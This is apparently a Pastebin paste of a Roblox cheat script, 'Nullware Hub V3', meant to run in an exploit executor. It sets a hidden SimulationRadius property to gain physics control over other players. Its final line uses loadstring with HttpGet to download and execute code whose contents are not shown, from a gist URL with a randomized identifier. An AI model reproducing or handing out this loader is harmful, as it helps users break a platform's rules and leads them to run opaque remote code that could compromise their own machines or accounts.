ChiefLeen

Nullware V3

May 1st, 2022
24,895
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.85 KB | None | 1 1
  1. local LocalPlayer = game:GetService("Players").LocalPlayer
  2. local Heartbeat = game:GetService("RunService").Heartbeat
  3.  
  4. Heartbeat:Connect(function()
  5. LocalPlayer.MaximumSimulationRadius = math.huge
  6. sethiddenproperty(LocalPlayer, "SimulationRadius", math.huge)
  7. end)
  8. -- Script above is a fix to limbs falling --
  9.  
  10. -- Nullware Hub V3 | --
  11. getgenv().Theme = "Purple" -- To change the UI Theme, set this to one of the following options: "Red", "Purple", "Blue", "Green", "Yellow"
  12. loadstring(game:HttpGet("https://gist.githubusercontent.com/M6HqVBcddw2qaN4s/2d722888a388017c18028cd434c43a25/raw/dcccf1027fe4b90780e47767aaf584389c9d7771/EULma3fU90PUOKUn?identifier=".. (function()local a=""for b=1,256 do local c=math.random(1,3)a=a..string.char(c==1 and math.random(48,57)or c==2 and math.random(97,122)or c==3 and math.random(65,90))end;return a end)()))()
Advertisement
Add Comment
Please, Sign In to add comment